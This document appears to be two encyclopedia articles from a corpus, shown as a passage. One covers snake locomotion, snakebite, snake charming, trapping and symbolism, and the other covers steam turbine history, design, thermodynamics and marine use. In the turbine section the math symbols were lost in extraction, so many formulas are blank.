locomotion for most snake species. In this mode, the posteriorly moving waves push against contact points in the environment, such as rocks, twigs, irregularities in the soil, etc. Each of these environmental objects, in turn, generates a reaction force directed forward and towards the midline of the snake, resulting in forward thrust while the lateral components cancel out. The speed of this movement depends upon the density of push-points in the environment, with a medium density of about 8 along the snake's length being ideal. The wave speed is precisely the same as the snake speed, and as a result, every point on the snake's body follows the path of the point ahead of it, allowing snakes to move through very dense vegetation and small openings. When swimming, the waves become larger as they move down the snake's body, and the wave travels backwards faster than the snake moves forwards. Thrust is generated by pushing their body against the water, resulting in the observed slip. In spite of overall similarities, studies show that the pattern of muscle activation is different in aquatic versus terrestrial lateral undulation, which justifies calling them separate modes. All snakes can laterally undulate forward (with backward-moving waves), but only sea snakes have been observed reversing the motion (moving backwards with forward-moving waves). Sidewinding Most often employed by colubroid snakes (colubrids, elapids, and vipers) when the snake must move in an environment that lacks irregularities to push against (rendering lateral undulation impossible), such as a slick mud flat, or a sand dune, sidewinding is a modified form of lateral undulation in which all of the body segments oriented in one direction remain in contact with the ground, while the other segments are lifted up, resulting in a peculiar "rolling" motion. The sidewinder moves forward by throwing a loop of itself and then pulling itself up by it. By lowering its head the snake gets leverage, straightening itself out and pressing itself against the ground, it brings itself forward and at an angle that leaves it ready for the next jump. The head and the loop are in effect the two feet upon which the snake walks. The snake's body, appearing roughly perpendicular to its direction, may bewilder the observer, since preconception may lead one to associate snake movement with a head that leads and a body that follows. It appears the sidewinder is going sideways - but precisely where the snake is going, where it wants to go, the head gives clear indication. The snake leaves behind a trail that looks like a series of hooks one after the next. Snakes can move backwards to retreat from an enemy, though they normally do not. This mode of locomotion overcomes the slippery nature of sand or mud by pushing off with only static portions on the body, thereby minimizing slipping. The static nature of the contact points can be shown from the tracks of a sidewinding snake, which show each belly scale imprint, without any smearing. This mode of locomotion has very low caloric cost, less than of the cost for a lizard to move the same distance. Contrary to popular belief, there is no evidence that sidewinding is associated with the sand being hot. Concertina When push-points are absent, but there is not enough space to use sidewinding because of lateral constraints, such as in tunnels, snakes rely on concertina locomotion. In this mode, the snake braces the posterior portion of its body against the tunnel wall while the front of the snake extends and straightens. The front portion then flexes and forms an anchor point, and the posterior is straightened and pulled forwards. This mode of locomotion is slow and very demanding, up to seven times the cost of laterally undulating over the same distance. This high cost is due to the repeated stops and starts of portions of the body as well as the necessity of using active muscular effort to brace against the tunnel walls. Arboreal The movement of snakes in arboreal habitats has only recently been studied. While on tree branches, snakes use several modes of locomotion depending on species and bark texture. In general, snakes will use a modified form of concertina locomotion on smooth branches, but will laterally undulate if contact points are available. Snakes move faster on small branches and when contact points are present, in contrast to limbed animals, which do better on large branches with little 'clutter'. Gliding snakes (Chrysopelea) of Southeast Asia launch themselves from branch tips, spreading their ribs and laterally undulating as they glide between trees. These snakes can perform a controlled glide for hundreds of feet depending upon launch altitude and can even turn in midair. Rectilinear The slowest mode of snake locomotion is rectilinear locomotion, which is also the only one where the snake does not need to bend its body laterally, though it may do so when turning. In this mode, the belly scales are lifted and pulled forward before being placed down and the body pulled over them. Waves of movement and stasis pass posteriorly, resulting in a series of ripples in the skin. The ribs of the snake do not move in this mode of locomotion and this method is most often used by large pythons, boas, and vipers when stalking prey across open ground as the snake's movements are subtle and harder to detect by their prey in this manner. Interactions with humans Bite Snakes do not ordinarily prey on humans. Unless startled or injured, most snakes prefer to avoid contact and will not attack humans. With the exception of large constrictors, nonvenomous snakes are not a threat to humans. The bite of a nonvenomous snake is usually harmless; their teeth are not adapted for tearing or inflicting a deep puncture wound, but rather grabbing and holding. Although the possibility of infection and tissue damage is present in the bite of a nonvenomous snake, venomous snakes present far greater hazard to humans. The World Health Organization (WHO) lists snakebite under the "other neglected conditions" category. Documented deaths resulting from snake bites are uncommon. Nonfatal bites from venomous snakes may result in the need for amputation of a limb or part thereof. Of the roughly 725 species of venomous snakes worldwide, only 250 are able to kill a human with one bite. Australia averages only one fatal snake bite per year. In India, 250,000 snakebites are recorded in a single year, with as many as 50,000 recorded initial deaths. The WHO estimates that on the order of 100,000 people die each year as a result of snake bites, and around three times as many amputations and other permanent disabilities are caused by snakebites annually. The health of people is seriously threatened by snakebites, especially in areas where there is a great diversity of snakes and little access to medical care such as the Amazon Rainforest region in South America. Snakebite is classified by the World Health Organization (WHO) as "other neglected conditions". Although there aren't many recorded snakebite deaths, the bites can cause serious complications and permanent impairments. The most successful treatment for snakebites is still antivenom, which is made from snake venom. However, access to antivenom differs greatly by location, with rural areas frequently experiencing difficulties with both cost and availability. Clinical studies, serum preparation, and venom extraction are among the intricate procedures involved in the manufacturing of antivenom. The development of alternative treatments and increased accessibility and affordability of antivenom are essential for reducing the global impact of snake bites on human populations. Snake charmers In some parts of the world, especially in India, snake charming is a roadside show performed by a charmer. In such a show, the snake charmer carries a basket containing a snake that he seemingly charms by playing tunes with his flutelike musical instrument, to which the snake responds. The snake is in fact responding to the movement of the flute, not the sound it makes, as snakes lack external ears (though they do have internal ears). The Wildlife Protection Act of 1972 in India technically prohibits snake charming on the grounds of reducing animal cruelty. Other types of snake charmers use a snake and mongoose show, where the two animals have a mock fight; however, this is not very common, as the animals may be seriously injured or killed. Snake charming as a profession is dying out in India because of competition from modern forms of entertainment and environment laws proscribing the practice. Many Indians have never seen snake charming and it is becoming a folktale of the past. Trapping The Irulas tribe of Andhra Pradesh and Tamil Nadu in India have been hunter-gatherers in the hot, dry plains forests, and have practiced the art of snake catching for generations. They have a vast knowledge of snakes in the field. They generally catch the snakes with the help of a simple stick. Earlier, the Irulas caught thousands of snakes for the snake-skin industry. After the complete ban of the snake-skin industry in India and protection of all snakes under the Indian Wildlife (Protection) Act 1972, they formed the Irula Snake Catcher's Cooperative and switched to catching snakes for removal of venom, releasing them in the wild after four extractions. The venom so collected is used for producing life-saving antivenom, biomedical research and for other medicinal products. The Irulas are also known to eat some of the snakes they catch and are very useful in rat extermination in the villages. Despite the existence of snake charmers, there have also been professional snake catchers or wranglers. Modern-day snake trapping involves a herpetologist using a long stick with a V-shaped end. Some television show hosts, like Bill Haast, Austin Stevens, Steve Irwin, and Jeff Corwin, prefer to catch them using bare hands. Consumption Consuming snake flesh and related goods is a reflection of many cultures around the world, especially in Asian nations like China, Taiwan, Thailand, Indonesia, Vietnam, and Cambodia. Because of its supposed health benefits and aphrodisiac qualities, snake meat is frequently regarded as a delicacy and ingested. It is customary to drink wine laced with snake blood in an attempt to increase virility and vigor. Traditional Chinese medicine holds that snake wine, a traditional beverage infused with whole snakes, offers medicinal uses. Snake wine's origins are in Chinese culture. However, using snake goods creates moral questions about conservation and animal welfare. It is important to pay attention to and regulate the sustainable harvesting of snakes for human food, particularly in areas where snake populations are in decline as a result of habitat degradation and overexploitation. Pets In the Western world, some snakes are kept as pets, especially docile species such as the ball python and corn snake. To meet the demand, a captive breeding industry has developed. Snakes bred in captivity are considered preferable to specimens caught in the wild and tend to make better pets. Compared with more traditional types of companion animal, snakes can be very low-maintenance pets; they require minimal space, as most common species do not exceed in length, and can be fed relatively infrequently—usually once every five to fourteen days. Certain snakes have a lifespan of more than 40 years if given proper care. Symbolism In ancient Mesopotamia, Nirah, the messenger god of Ištaran, was represented as a serpent on kudurrus, or boundary stones. Representations of two intertwined serpents are common in Sumerian art and Neo-Sumerian artwork and still appear sporadically on cylinder seals and amulets until as late as the thirteenth century BC. The horned viper (Cerastes cerastes) appears in Kassite and Neo-Assyrian kudurrus and is invoked in Assyrian texts as a magical protective entity. A dragon-like creature with horns, the body and neck of a snake, the forelegs of a lion, and the hind-legs of a bird appears in Mesopotamian art from the Akkadian Period until the Hellenistic Period (323 BC–31 BC). This creature, known in Akkadian as the mušḫuššu, meaning "furious serpent", was used as a symbol for particular deities and also as a general protective emblem. It seems to have originally been the attendant of the Underworld god Ninazu, but later became the attendant to the Hurrian storm-god Tishpak, as well as, later, Ninazu's son Ningishzida, the Babylonian national god Marduk, the scribal god Nabu, and the Assyrian national god Ashur. In Egyptian history, the snake occupies a primary role with the Nile cobra adorning the crown of the pharaoh in ancient times. It was worshipped as one of the gods and was also used for sinister purposes: murder of an adversary and ritual suicide (Cleopatra). The ouroboros was a well-known ancient Egyptian symbol of a serpent swallowing its own tail. The precursor to the ouroboros was the "Many-Faced", a serpent with five heads, who, according to the Amduat, the oldest surviving Book of the Afterlife, was said to coil around the corpse of the sun god Ra protectively. The earliest surviving depiction of a "true" ouroboros comes from the gilded shrines in the tomb of Tutankhamun. In the early centuries AD, the ouroboros was adopted as a symbol by Gnostic Christians and chapter 136 of the Pistis Sophia, an early Gnostic text, describes "a great dragon whose tail is in its mouth". In medieval alchemy, the ouroboros became a typical western dragon with wings, legs, and a tail. In the Bible, King Nahash of Ammon, whose name means "Snake", is depicted very negatively, as a particularly cruel and despicable enemy of the ancient Hebrews. The ancient Greeks used the Gorgoneion, a depiction of a hideous face with serpents for hair, as an apotropaic symbol to ward off evil. In a Greek myth described by Pseudo-Apollodorus in his Bibliotheca, Medusa was a Gorgon with serpents for hair whose gaze turned all those who looked at her to stone and was slain by the hero Perseus. In the Roman poet Ovid's Metamorphoses, Medusa is said to have once been a beautiful priestess of Athena, whom Athena turned into a serpent-haired monster after she was raped by the god Poseidon in Athena's temple. In another myth referenced by the Boeotian poet Hesiod and described in detail by Pseudo-Apollodorus, the hero Heracles is said to have slain the Lernaean Hydra, a multiple-headed serpent which dwelt in the swamps of Lerna. The legendary account of the foundation of Thebes mentioned a monster snake guarding the spring from which the new settlement was to draw its water. In fighting and killing the snake, the companions of the founder Cadmus all perished—leading to the term "Cadmean victory" (i.e. a victory involving one's own ruin). Three medical symbols involving snakes that are still used today are Bowl of Hygieia, symbolizing pharmacy, and the Caduceus and Rod of Asclepius, which are symbols denoting medicine in general. One of the etymologies proposed for the common female first name Linda is that it might derive from Old German Lindi or Linda, meaning a serpent. India is often called the land of snakes and is steeped in tradition regarding snakes. Snakes are worshipped as gods even today with many women pouring milk on snake pits (despite snakes' aversion for milk). The cobra is seen on the neck of Shiva and Vishnu is depicted often as sleeping on a seven-headed snake or within the coils of a serpent. There are also several temples in India solely for cobras sometimes called Nagraj (King of Snakes) and it is believed that snakes are symbols of fertility. There is a Hindu festival called Nag Panchami each year on which day snakes are venerated and prayed to.
Biology and health sciences
Reptiles
null
29374
https://en.wikipedia.org/wiki/Steam%20turbine
Steam turbine
A steam turbine or steam turbine engine is a machine or heat engine that extracts thermal energy from pressurized steam and uses it to do mechanical work on a rotating output shaft. Its modern manifestation was invented by Charles Parsons in 1884. Fabrication of a modern steam turbine involves advanced metalwork to form high-grade steel alloys into precision parts using technologies that first became available in the 20th century; continued advances in durability and efficiency of steam turbines remains central to the energy economics of the 21st century. The steam turbine is a form of heat engine that derives much of its improvement in thermodynamic efficiency from the use of multiple stages in the expansion of the steam, which results in a closer approach to the ideal reversible expansion process. Because the turbine generates rotary motion, it can be coupled to a generator to harness its motion into electricity. Such turbogenerators are the core of thermal power stations which can be fueled by fossil fuels, nuclear fuels, geothermal, or solar energy. About 42% of all electricity generation in the United States in 2022 was by the use of steam turbines. Technical challenges include rotor imbalance, vibration, bearing wear, and uneven expansion (various forms of thermal shock). In large installations, even the sturdiest turbine will shake itself apart if operated out of trim. History The first device that may be classified as a reaction steam turbine was little more than a toy, the classic Aeolipile, described in the 1st century by Hero of Alexandria in Roman Egypt. In 1551, Taqi al-Din in Ottoman Egypt described a steam turbine with the practical application of rotating a spit. Steam turbines were also described by the Italian Giovanni Branca (1629) and John Wilkins in England (1648). The devices described by Taqi al-Din and Wilkins are today known as steam jacks. In 1672, an impulse turbine-driven small toy car was designed by Ferdinand Verbiest. A more modern version of this car was produced some time in the late 18th century by an unknown German mechanic. In 1775 at Soho James Watt designed a reaction turbine that was put to work there. In 1807, Polikarp Zalesov designed and constructed an impulse turbine, using it for the fire pump operation. In 1827 the Frenchmen Real and Pichon patented and constructed a compound impulse turbine. The modern steam turbine was invented in 1884 by Charles Parsons, whose first model was connected to a dynamo that generated of electricity. The invention of Parsons' steam turbine made cheap and plentiful electricity possible and revolutionized marine transport and naval warfare. Parsons' design was a reaction type. His patent was licensed and the turbine scaled up shortly after by an American, George Westinghouse. The Parsons turbine also turned out to be easy to scale up. Parsons had the satisfaction of seeing his invention adopted for all major world power stations, and the size of generators had increased from his first set up to units of capacity. Within Parsons' lifetime, the generating capacity of a unit was scaled up by about 10,000 times, and the total output from turbo-generators constructed by his firm C. A. Parsons and Company and by their licensees, for land purposes alone, had exceeded thirty million horse-power. Other variations of turbines have been developed that work effectively with steam. The de Laval turbine (invented by Gustaf de Laval) accelerated the steam to full speed before running it against a turbine blade. De Laval's impulse turbine is simpler and less expensive and does not need to be pressure-proof. It can operate with any pressure of steam, but is considerably less efficient. Auguste Rateau developed a pressure compounded impulse turbine using the de Laval principle as early as 1896, obtained a US patent in 1903, and applied the turbine to a French torpedo boat in 1904. He taught at the for a decade until 1897, and later founded a successful company that was incorporated into the Alstom firm after his death. One of the founders of the modern theory of steam and gas turbines was Aurel Stodola, a Slovak physicist and engineer and professor at the Swiss Polytechnical Institute (now ETH) in Zurich. His work (English: The Steam Turbine and its prospective use as a Heat Engine) was published in Berlin in 1903. A further book (English: Steam and Gas Turbines) was published in 1922. The Brown-Curtis turbine, an impulse type, which had been originally developed and patented by the U.S. company International Curtis Marine Turbine Company, was developed in the 1900s in conjunction with John Brown & Company. It was used in John Brown-engined merchant ships and warships, including liners and Royal Navy warships. Manufacturing The present day manufacturing industry for steam turbines consists of the following companies: WEG (Brazil) Harbin Electric, Shanghai Electric, Dongfang Electric (China) Doosan Škoda Power (Czech - South Korea) Alstom (France) Siemens Energy, BTT-Bremer Turbinentechnik GmbH, K&K Turboservice GmbH (Germany) BHEL, Larsen & Toubro, Triveni Engineering & Industries (India) MAPNA (Iran) Ansaldo (Italy) Mitsubishi, KwHI, Toshiba, IHI (Japan) Silmash, Ural TW, , KTZ, Energomash-Atomenergo, Power Machines, Leningradsky Metallichesky Zavod (Russia) Turboatom (Ukraine) EDF (France) Curtiss-Wright, Elliot Company, GE Vernova, Skinner Power Systems, Baker Hughes, Leonardo DRS, Chart Industries, Northrop Grumman Marine Systems (United States) Trillium Flow Technologies (United Kingdom) EMS Power Machines (Turkey) Types Steam turbines are made in a variety of sizes ranging from small <0.75 kW (<1 hp) units (rare) used as mechanical drives for pumps, compressors and other shaft driven equipment, to turbines used to generate electricity. There are several classifications for modern steam turbines. Blade and stage design Turbine blades are of two basic types, blades and nozzles. Blades move entirely due to the impact of steam on them and their profiles do not converge. This results in a steam velocity drop and essentially no pressure drop as steam moves through the blades. A turbine composed of blades alternating with fixed nozzles is called an impulse turbine, , Rateau turbine, or Brown-Curtis turbine. Nozzles appear similar to blades, but their profiles converge near the exit. This results in a steam pressure drop and velocity increase as steam moves through the nozzles. Nozzles move due to both the impact of steam on them and the reaction due to the high-velocity steam at the exit. A turbine composed of moving nozzles alternating with fixed nozzles is called a reaction turbine or Parsons turbine. Except for low-power applications, turbine blades are arranged in multiple stages in series, called compounding, which greatly improves efficiency at low speeds. A reaction stage is a row of fixed nozzles followed by a row of moving nozzles. Multiple reaction stages divide the pressure drop between the steam inlet and exhaust into numerous small drops, resulting in a pressure-compounded turbine. Impulse stages may be either pressure-compounded, velocity-compounded, or pressure-velocity compounded. A pressure-compounded impulse stage is a row of fixed nozzles followed by a row of moving blades, with multiple stages for compounding. This is also known as a Rateau turbine, after its inventor. A velocity-compounded impulse stage (invented by Curtis and also called a "Curtis wheel") is a row of fixed nozzles followed by two or more rows of moving blades alternating with rows of fixed blades. This divides the velocity drop across the stage into several smaller drops. A series of velocity-compounded impulse stages is called a pressure-velocity compounded turbine. By 1905, when steam turbines were coming into use on fast ships (such as ) and in land-based power applications, it had been determined that it was desirable to use one or more Curtis wheels at the beginning of a multi-stage turbine (where the steam pressure is highest), followed by reaction stages. This was more efficient with high-pressure steam due to reduced leakage between the turbine rotor and the casing. This is illustrated in the drawing of the German 1905 AEG marine steam turbine. The steam from the boilers enters from the right at high pressure through a throttle, controlled manually by an operator (in this case a sailor known as the throttleman). It passes through five Curtis wheels and numerous reaction stages (the small blades at the edges of the two large rotors in the middle) before exiting at low pressure, almost certainly to a condenser. The condenser provides a vacuum that maximizes the energy extracted from the steam, and condenses the steam into feedwater to be returned to the boilers. On the left are several additional reaction stages (on two large rotors) that rotate the turbine in reverse for astern operation, with steam admitted by a separate throttle. Since ships are rarely operated in reverse, efficiency is not a priority in astern turbines, so only a few stages are used to save cost. Blade design challenges A major challenge facing turbine design was reducing the creep experienced by the blades. Because of the high temperatures and high stresses of operation, steam turbine materials become damaged through these mechanisms. As temperatures are increased in an effort to improve turbine efficiency, creep becomes significant. To limit creep, thermal coatings and superalloys with solid-solution strengthening and grain boundary strengthening are used in blade designs. Protective coatings are used to reduce the thermal damage and to limit oxidation. These coatings are often stabilized zirconium dioxide-based ceramics. Using a thermal protective coating limits the temperature exposure of the nickel superalloy. This reduces the creep mechanisms experienced in the blade. Oxidation coatings limit efficiency losses caused by a buildup on the outside of the blades, which is especially important in the high-temperature environment. The nickel-based blades are alloyed with aluminum and titanium to improve strength and creep resistance. The microstructure of these alloys is composed of different regions of composition. A uniform dispersion of the gamma-prime phase – a combination of nickel, aluminum, and titanium – promotes the strength and creep resistance of the blade due to the microstructure. Refractory elements such as rhenium and ruthenium can be added to the alloy to improve creep strength. The addition of these elements reduces the diffusion of the gamma prime phase, thus preserving the fatigue resistance, strength, and creep resistance. Steam supply and exhaust conditions Turbine types include condensing, non-condensing, reheat, extracting and induction. Condensing turbines Condensing turbines are most commonly found in electrical power plants. These turbines receive steam from a boiler and exhaust it to a condenser. The exhausted steam is at a pressure well below atmospheric, and is in a partially condensed state, typically of a quality near 90%. Non-condensing turbines Non-condensing turbines are most widely used for process steam applications, in which the steam will be used for additional purposes after being exhausted from the turbine. The exhaust pressure is controlled by a regulating valve to suit the needs of the process steam pressure. These are commonly found at refineries, district heating units, pulp and paper plants, and desalination facilities where large amounts of low pressure process steam are needed. Reheat turbines Reheat turbines are also used almost exclusively in electrical power plants. In a reheat turbine, steam flow exits from a high-pressure section of the turbine and is returned to the boiler where additional superheat is added. The steam then goes back into an intermediate pressure section of the turbine and continues its expansion. Using reheat in a cycle increases the work output from the turbine and also the expansion reaches conclusion before the steam condenses, thereby minimizing the erosion of the blades in last rows. In most of the cases, maximum number of reheats employed in a cycle is 2 as the cost of super-heating the steam negates the increase in the work output from turbine. Extracting turbines Extracting type turbines are common in all applications. In an extracting type turbine, steam is released from various stages of the turbine, and used for industrial process needs or sent to boiler feedwater heaters to improve overall cycle efficiency. Extraction flows may be controlled with a valve, or left uncontrolled. Extracted steam results in a loss of power in the downstream stages of the turbine. Induction turbines introduce low pressure steam at an intermediate stage to produce additional power. Casing or shaft arrangements These arrangements include single casing, tandem compound and cross compound turbines. Single casing units are the most basic style where a single casing and shaft are coupled to a generator. Tandem compound are used where two or more casings are directly coupled together to drive a single generator. A cross compound turbine arrangement features two or more shafts not in line driving two or more generators that often operate at different speeds. A cross compound turbine is typically used for many large applications. A typical 1930s-1960s naval installation is illustrated below; this shows high- and low-pressure turbines driving a common reduction gear, with a geared cruising turbine on one high-pressure turbine. Two-flow rotors The moving steam imparts both a tangential and axial thrust on the turbine shaft, but the axial thrust in a simple turbine is unopposed. To maintain the correct rotor position and balancing, this force must be counteracted by an opposing force. Thrust bearings can be used for the shaft bearings, the rotor can use dummy pistons, it can be double flow- the steam enters in the middle of the shaft and exits at both ends, or a combination of any of these. In a double flow rotor, the blades in each half face opposite ways, so that the axial forces negate each other but the tangential forces act together. This design of rotor is also called two-flow, double-axial-flow, or double-exhaust. This arrangement is common in low-pressure casings of a compound turbine. Principle of operation and design An ideal steam turbine is considered to be an isentropic process, or constant entropy process, in which the entropy of the steam entering the turbine is equal to the entropy of the steam leaving the turbine. No steam turbine is truly isentropic, however, with typical isentropic efficiencies ranging from 20 to 90% based on the application of the turbine. The interior of a turbine comprises several sets of blades or buckets. One set of stationary blades is connected to the casing and one set of rotating blades is connected to the shaft. The sets intermesh with certain minimum clearances, with the size and configuration of sets varying to efficiently exploit the expansion of steam at each stage. Impulse turbines An impulse turbine has fixed nozzles that orient the steam flow into high speed jets. These jets contain significant kinetic energy, which is converted into shaft rotation by the bucket-like shaped rotor blades, as the steam jet changes direction. A pressure drop occurs across only the stationary blades, with a net increase in steam velocity across the stage. As the steam flows through the nozzle its pressure falls from inlet pressure to the exit pressure (atmospheric pressure or, more usually, the condenser vacuum). Due to this high ratio of expansion of steam, the steam leaves the nozzle with a very high velocity. The steam leaving the moving blades has a large portion of the maximum velocity of the steam when leaving the nozzle. The loss of energy due to this higher exit velocity is commonly called the carry over velocity or leaving loss. The law of moment of momentum states that the sum of the moments of external forces acting on a fluid which is temporarily occupying the control volume is equal to the net time change of angular momentum flux through the control volume. The swirling fluid enters the control volume at radius with tangential velocity and leaves at radius with tangential velocity . A velocity triangle paves the way for a better understanding of the relationship between the various velocities. In the adjacent figure we have: and are the absolute velocities at the inlet and outlet respectively. and are the flow velocities at the inlet and outlet respectively. and are the swirl velocities at the inlet and outlet respectively, in the moving reference. and are the relative velocities at the inlet and outlet respectively. is the velocity of the blade. is the guide vane angle and is the blade angle. Then by the law of moment of momentum, the torque on the fluid is given by: For an impulse steam turbine: . Therefore, the tangential force on the blades is . The work done per unit time or power developed: . When ω is the angular velocity of the turbine, then the blade speed is . The power developed is then . Blade efficiency Blade efficiency () can be defined as the ratio of the work done on the blades to kinetic energy supplied to the fluid, and is given by Stage efficiency A stage of an impulse turbine consists of a nozzle set and a moving wheel. The stage efficiency defines a relationship between enthalpy drop in the nozzle and work done in the stage. Where is the specific enthalpy drop of steam in the nozzle. By the first law of thermodynamics: Assuming that is appreciably less than , we get . Furthermore, stage efficiency is the product of blade efficiency and nozzle efficiency, or . Nozzle efficiency is given by , where the enthalpy (in J/Kg) of steam at the entrance of the nozzle is and the enthalpy of steam at the exit of the nozzle is . The ratio of the cosines of the blade angles at the outlet and inlet can be taken and denoted . The ratio of steam velocities relative to the rotor speed at the outlet to the inlet of the blade is defined by the friction coefficient . and depicts the loss in the relative velocity due to friction as the steam flows around the blades ( for smooth blades). The ratio of the blade speed to the absolute steam velocity at the inlet is termed the blade speed ratio . is maximum when or, . That implies and therefore . Now (for a single stage impulse turbine). Therefore, the maximum value of stage efficiency is obtained by putting the value of in the expression of . We get: . For equiangular blades, , therefore , and we get . If the friction due to the blade surface is neglected then . Conclusions on maximum efficiency For a given steam velocity work done per kg of steam would be maximum when or . As increases, the work done on the blades reduces, but at the same time surface area of the blade reduces, therefore there are less frictional losses. Reaction turbines In the reaction turbine, the rotor blades themselves are arranged to form convergent nozzles. This type of turbine makes use of the reaction force produced as the steam accelerates through the nozzles formed by the stator. Steam is directed onto the rotor by the fixed vanes of the stator. It leaves the stator as a jet that fills the entire circumference of the rotor. The steam then changes direction and increases its speed relative to the speed of the blades. A pressure drop occurs across both the stator and the rotor, with steam accelerating through the stator and decelerating through the rotor, with no net change in steam velocity across the stage but with a decrease in both pressure and temperature, reflecting the work performed in the driving of the rotor. Blade efficiency Energy input to the blades in a stage: is equal to the kinetic energy supplied to the fixed blades (f) + the kinetic energy supplied to the moving blades (m). Or, = enthalpy drop over the fixed blades, + enthalpy drop over the moving blades, . The effect of expansion of steam over the moving blades is to increase the relative velocity at the exit. Therefore, the relative velocity at the exit is always greater than the relative velocity at the inlet . In terms of velocities, the enthalpy drop over the moving blades is given by: (it contributes to a change in static pressure) The enthalpy drop in the fixed blades, with the assumption that the velocity of steam entering the fixed blades is equal to the velocity of steam leaving the previously moving blades is given by: where V0 is the inlet velocity of steam in the nozzle is very small and hence can be neglected. Therefore, A very widely used design has half degree of reaction or 50% reaction and this is known as Parson's turbine. This consists of symmetrical rotor and stator blades. For this turbine the velocity triangle is similar and we have: , , Assuming Parson's turbine and obtaining all the expressions we get From the inlet velocity triangle we have Work done (for unit mass flow per second): Therefore, the blade efficiency is given by Condition of maximum blade efficiency If , then For maximum efficiency , we get and this finally gives Therefore, is found by putting the value of in the expression of blade efficiency Operation and maintenance Steam turbines and their casings have a high thermal inertia due to the high pressures used in steam circuits and the materials used. When warming up a set for use, the main steam stop valves (after the boiler) have a bypass line to allow superheated steam to slowly bypass the valve and proceed to heat up the lines in the system along with the steam turbine. In addition, when there is no steam, a turning gear is engaged to slowly rotate the turbine to ensure even heating and prevent uneven expansion. After first rotating the turbine by the turning gear, allowing time for the rotor to assume a straight plane (no bowing), then the turning gear is disengaged and steam is admitted to the turbine, first to the astern blades then to the ahead blades slowly rotating the turbine at 10–15 RPM (0.17–0.25 Hz) to slowly warm the turbine. The warm-up procedure for large steam turbines may exceed ten hours. During normal operation, rotor imbalance can lead to vibration, which, because of the high rotation velocities, could lead to a blade breaking away from the rotor and through the casing. To mitigate this risk, significant efforts are made to balance the turbine. Also, turbines are run with high-quality steam: either superheated (dry) steam, or saturated steam with a high dryness fraction. This prevents the rapid impingement and erosion of the blades which occurs when condensed water is blasted onto the blades (moisture carry over). Also, liquid water entering the blades may damage the thrust bearings for the turbine shaft. To prevent this, along with controls and baffles in the boilers to ensure high-quality steam, condensate drains are installed in the steam piping leading to the turbine. Maintenance requirements of modern steam turbines are simple and incur low costs (typically around $0.005 per kWh); their operational life often exceeds 50 years.Turbines also use high-quality steam, such as superheated (dry) steam or saturated steam with a high dryness fraction. Speed regulation The control of a turbine with a governor is essential, as turbines need to be run up slowly to prevent damage and some applications (such as the generation of alternating current electricity) require precise speed control. Uncontrolled acceleration of the turbine rotor can lead to an overspeed trip, which causes the governor and throttle valves that control the flow of steam to the turbine to close. If these valves fail then the turbine may continue accelerating until it breaks apart, often catastrophically. Turbines are expensive to make, requiring precision manufacture and special quality materials. During normal operation in synchronization with the electricity network, power plants are governed with a five percent droop speed control. This means the full load speed is 100% and the no-load speed is 105%. This is required for the stable operation of the network without hunting and drop-outs of power plants. Normally the changes in speed are minor. Adjustments in power output are made by slowly raising the droop curve by increasing the spring pressure on a centrifugal governor. Generally this is a basic system requirement for all power plants because the older and newer plants have to be compatible in response to the instantaneous changes in frequency without depending on outside communication. Thermodynamics of steam turbines The steam turbine operates on basic principles of thermodynamics using the part 3-4 of the Rankine cycle shown in the adjoining diagram. Superheated steam (or dry saturated steam, depending on application) leaves the boiler at high temperature and high pressure. At entry to the turbine, the steam gains kinetic energy by passing through a nozzle (a fixed nozzle in an impulse type turbine or the fixed blades in a reaction type turbine). When the steam leaves the nozzle it is moving at high velocity towards the blades of the turbine rotor. A force is created on the blades due to the pressure of the vapor on the blades causing them to move. A generator or other such device can be placed on the shaft, and the energy that was in the steam can now be stored and used. The steam leaves the turbine as a saturated vapor (or liquid-vapor mix depending on application) at a lower temperature and pressure than it entered with and is sent to the condenser to be cooled. The first law enables us to find a formula for the rate at which work is developed per unit mass. Assuming there is no heat transfer to the surrounding environment and that the changes in kinetic and potential energy are negligible compared to the change in specific enthalpy we arrive at the following equation where Ẇ is the rate at which work is developed per unit time ṁ is the rate of mass flow through the turbine Isentropic efficiency To measure how well a turbine is performing we can look at its isentropic efficiency. This compares the actual performance of the turbine with the performance that would be achieved by an ideal, isentropic, turbine. When calculating this efficiency, heat lost to the surroundings is assumed to be zero. Steam's starting pressure and temperature is the same for both the actual and the ideal turbines, but at turbine exit, steam's energy content ('specific enthalpy') for the actual turbine is greater than that for the ideal turbine because of irreversibility in the actual turbine. The specific enthalpy is evaluated at the same steam pressure for the actual and ideal turbines in order to give a good comparison between the two. The isentropic efficiency is found by dividing the actual work by the ideal work. where is the specific enthalpy at state three is the specific enthalpy at state 4 for the actual turbine is the specific enthalpy at state 4s for the isentropic turbine (but note that the adjacent diagram does not show state 4s: it is vertically below state 3) Direct drive Electrical power stations use large steam turbines driving electric generators to produce most (about 80%) of the world's electricity. The advent of large steam turbines made central-station electricity generation practical, since reciprocating steam engines of large rating became very bulky, and operated at slow speeds. Most central stations are fossil fuel power plants and nuclear power plants; some installations use geothermal steam, or use concentrated solar power (CSP) to create the steam. Steam turbines can also be used directly to drive large centrifugal pumps, such as feedwater pumps at a thermal power plant. The turbines used for electric power generation are most often directly coupled to their generators. As the generators must rotate at constant synchronous speeds according to the frequency of the electric power system, the most common speeds are 3,000 RPM for 50 Hz systems, and 3,600 RPM for 60 Hz systems. Since nuclear reactors have lower temperature limits than fossil-fired plants, with lower steam quality, the turbine generator sets may be arranged to operate at half these speeds, but with four-pole generators, to reduce erosion of turbine blades. Marine propulsion In steamships, advantages of steam turbines over reciprocating engines are smaller size, lower maintenance, lighter weight, and lower vibration. A steam turbine is efficient only when operating in the thousands of RPM, while the most effective propeller designs are for speeds less than 300 RPM; consequently, precise (thus expensive) reduction gears are usually required, although numerous early ships through World War I, such as Turbinia, had direct drive from the steam turbines to the propeller shafts. Another alternative is turbo-electric transmission, in which an electrical generator run by the high-speed turbine is used to run one or more slow-speed electric motors connected to the propeller shafts; precision gear cutting may be a production bottleneck during wartime. Turbo-electric drive was most used in large US warships designed during World War I and in some fast liners, and was used in some troop transports and mass-production destroyer escorts in World War II. The higher cost of turbines and the associated gears or generator/motor sets is offset by lower maintenance requirements and the smaller size of a turbine in comparison with a reciprocating engine of equal power, although the fuel costs are higher than those of a diesel engine because steam turbines have lower thermal efficiency. To reduce fuel costs the thermal efficiency of both types of engine have been improved over the years. Early development The development of steam turbine marine propulsion from 1894 to 1935 was dominated by the need to reconcile the high efficient speed of the turbine with the low efficient speed (less than 300 rpm) of the ship's propeller at an overall cost competitive with reciprocating engines. In 1894, efficient reduction gears were not available for the high powers required by ships, so direct drive was necessary. In Turbinia, which has direct drive to each propeller shaft, the efficient speed of the turbine was reduced after initial trials by directing the steam flow through all three direct drive turbines (one on each shaft) in series, probably totaling around 200 